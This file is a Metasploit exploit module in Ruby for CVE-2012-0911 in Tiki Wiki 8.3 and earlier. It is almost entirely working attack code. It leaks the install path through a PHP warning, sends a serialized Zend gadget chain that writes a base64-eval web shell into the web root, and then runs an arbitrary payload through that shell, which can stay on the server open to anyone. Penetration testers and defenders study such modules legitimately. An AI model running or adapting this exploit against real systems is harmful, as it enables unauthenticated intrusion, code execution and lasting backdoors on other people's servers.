##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
  5.  
  6. require 'msf/core'
  7.  
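# Tiki Wiki <= 8.3 unserialize() PHP code execution (CVE-2012-0911).
#
# Flow: disclose the on-disk install path through a PHP warning, POST a crafted
# serialized object graph to tiki-print_multi_pages.php so that Zend gadget
# __destruct() methods write a small PHP stager into the web root, then drive
# the stager with the framework payload.
#
# Operational caveat: the stager is an unauthenticated web shell (it evals
# whatever arrives base64-encoded in the "Cmd" request header). It is only
# removed automatically when the resulting session is meterpreter; with any
# other payload it stays on disk and must be deleted by hand.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Extracts the Tiki Wiki directory (with trailing slash) from the PHP warning
  # that tiki-rss_error.php prints when display_errors is On. The warning is
  # expected to contain the absolute script path; we capture everything from
  # the first "/" up to the script name.
  PATH_DISCLOSURE_RE = %r{[> ](?<dir>/.*)tiki-rss_error\.php}

  # PHP stager written into the web root by the gadget chain. PHP exposes the
  # "Cmd" request header as $_SERVER['HTTP_CMD'].
  PHP_STAGER = "<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>"

  # Registers module metadata and the TARGETURI option.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Tiki Wiki <= 8.3 unserialize() PHP Code Execution',
      'Description'    => %q{
          This module exploits a php unserialize() vulnerability in Tiki Wiki <= 8.3
        which could be abused to allow unauthenticated users to execute arbitrary code
        under the context of the webserver user.

        The dangerous unserialize() exists in the 'tiki-print_multi_pages.php' script,
        which is called with user controlled data from the 'printpages' parameter.
        The exploit abuses the __destruct() method from the Zend_Pdf_ElementFactory_Proxy
        class to write arbitrary PHP code to a file on the Tiki Wiki web directory.

        In order to run successfully three conditions must be satisfied (1) display_errors
        php setting must be On to disclose the filesystem path of Tiki Wiki, (2) The Tiki
        Wiki Multiprint feature must be enabled to exploit the unserialize() and (3) a php
        version older than 5.3.4 must be used to allow poison null bytes in filesystem related
        functions. The exploit has been tested successfully on Ubuntu 9.10 and Tiki Wiki 8.3.
      },
      'Author'  =>
        [
          'EgiX', # Vulnerability discovery and PoC
          'juan vazquez' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2012-0911' ],
          [ 'OSVDB', '83534' ],
          [ 'BID', '54298' ],
          [ 'EDB', '19573' ],
          [ 'URL', 'http://dev.tiki.org/item4109' ]
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Payload'        =>
        {
          'DisableNops' => true,
        },
      'Targets'        => [ ['Automatic', {}] ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jul 04 2012'
      ))

      register_options(
        [
          OptString.new('TARGETURI', [ true, "The base path to the web application", "/tiki/"])
        ], self.class)
  end

  # Best-effort removal of the dropped stager once a session is up.
  #
  # Only a meterpreter session can delete the file from here; for every other
  # payload type this is a no-op and the web shell remains reachable by anyone
  # until an operator removes it.
  #
  # @param client [Msf::Session] the newly established session
  def on_new_session(client)
    return unless client.type == "meterpreter"

    client.core.use("stdapi") unless client.ext.aliases.include?("stdapi")
    begin
      print_warning("#{peer} - Deleting #{@upload_php}")
      client.fs.file.rm(@upload_php)
      print_good("#{peer} - #{@upload_php} removed to stay ninja")
    rescue => e
      # The original message interpolated an undefined local (`f`), so the
      # failure path itself raised NameError instead of reporting the problem.
      print_error("#{peer} - Unable to remove #{@upload_php}: #{e.message}")
    end
  end

  # Runs the three stages: path disclosure, stager upload via unserialize(),
  # payload execution through the stager. Returns early (after printing an
  # error) when a stage fails.
  def exploit
    # dup: target_uri.path is mutated by << otherwise.
    base = target_uri.path.dup
    base << '/' unless base.end_with?('/')
    # Random stager name so repeated runs don't collide on the target.
    @upload_php = rand_text_alpha(rand(4) + 4) + ".php"

    print_status("#{peer} - Disclosing the path of the Tiki Wiki on the filesystem")

    tiki_path = disclose_tiki_path(base)
    unless tiki_path
      print_error "Tiki Wiki path couldn't be disclosed. The php setting 'display_errors' must be On."
      return
    end
    print_good "#{peer} - Tiki Wiki path disclosure: #{tiki_path}"

    print_status("#{peer} - Exploiting the unserialize() to upload PHP code")

    res = send_request_cgi(
    {
      'uri' => normalize_uri(base, "tiki-print_multi_pages.php"),
      'method' => 'POST',
      'vars_post' => {
        'printpages' => serialized_printpages(tiki_path, PHP_STAGER)
      }
    })

    unless res && res.code == 200
      # res is nil on timeout / connection failure; the original called
      # res.code unconditionally here and crashed with NoMethodError.
      status = res ? res.code : 'no response'
      print_error("#{peer} - Exploit failed: #{status}. The Tiki Wiki Multiprint feature must be enabled.")
      return
    end

    print_status("#{peer} - Executing the payload #{@upload_php}")

    res = send_request_cgi(
    {
      'method' => 'GET',
      'uri'    => normalize_uri(base, @upload_php),
      'headers' => {
        # Delivered to the stager as $_SERVER['HTTP_CMD'].
        'Cmd' => Rex::Text.encode_base64(payload.encoded)
      }
    })

    # As in the original logic, any HTTP response is treated as failure: a
    # PHP payload that keeps the connection open does not produce one.
    # NOTE(review): this assumes the chosen payload never returns normally — confirm
    # for non-connect-back payloads.
    if res
      print_error("#{peer} - Payload execution failed: #{res.code}")
      return
    end
  end

  private

  # Requests tiki-rss_error.php and pulls the install directory out of the
  # resulting PHP warning.
  #
  # @param base [String] normalized TARGETURI with trailing slash
  # @return [String, nil] directory (with trailing slash) or nil when the
  #   request failed, was not a 200, or the body did not disclose a path
  def disclose_tiki_path(base)
    res = send_request_cgi(
      'uri' => normalize_uri(base, "tiki-rss_error.php")
    )
    return nil unless res && res.code == 200

    match = PATH_DISCLOSURE_RE.match(res.body.to_s)
    match && match[:dir]
  end

  # Builds the serialized Zend gadget chain that, when unserialize()d and
  # destructed, writes php_payload into tiki_path + @upload_php.
  #
  # All s:N: lengths are PHP byte lengths, so bytesize is used rather than
  # length. Each %00 is expected to be URL-decoded server-side into a single
  # NUL byte and is counted as one byte in the hard-coded lengths
  # (e.g. 39 = 29 "Zend_Pdf_ElementFactory_Proxy" + 8 "_factory" + 2 NULs).
  # NOTE(review): confirm that send_request_cgi's parameter encoding does not
  # turn "%" into "%25" on this Rex version; if it does, the request needs
  # 'encode_params' => false for the gadget chain to deserialize at all.
  #
  # @param tiki_path   [String] absolute web-root directory with trailing slash
  # @param php_payload [String] PHP source to write into the dropped file
  # @return [String] serialized object graph for the 'printpages' parameter
  def serialized_printpages(tiki_path, php_payload)
    target_file = tiki_path + @upload_php

    printpages = "O:29:\"Zend_Pdf_ElementFactory_Proxy\":1:"
    printpages << "{s:39:\"%00Zend_Pdf_ElementFactory_Proxy%00_factory\";O:51:\"Zend_Search_Lucene_Index_SegmentWriter_StreamWriter\":5:"
    printpages << "{s:12:\"%00*%00_docCount\";i:1;s:8:\"%00*%00_name\";s:3:\"foo\";s:13:\"%00*%00_directory\";O:47:\"Zend_Search_Lucene_Storage_Directory_Filesystem\":1:"
    # +1 for the trailing NUL that truncates the path (poison null byte,
    # PHP < 5.3.4 only) so the writer lands on our .php file.
    printpages << "{s:11:\"%00*%00_dirPath\";s:#{target_file.bytesize + 1}:\"#{target_file}%00\";}"
    printpages << "s:10:\"%00*%00_fields\";a:1:"
    printpages << "{i:0;O:34:\"Zend_Search_Lucene_Index_FieldInfo\":1:"
    printpages << "{s:4:\"name\";s:#{php_payload.bytesize}:\"#{php_payload}\";}}"
    printpages << "s:9:\"%00*%00_files\";O:8:\"stdClass\":0:{}}}"
    printpages
  end
end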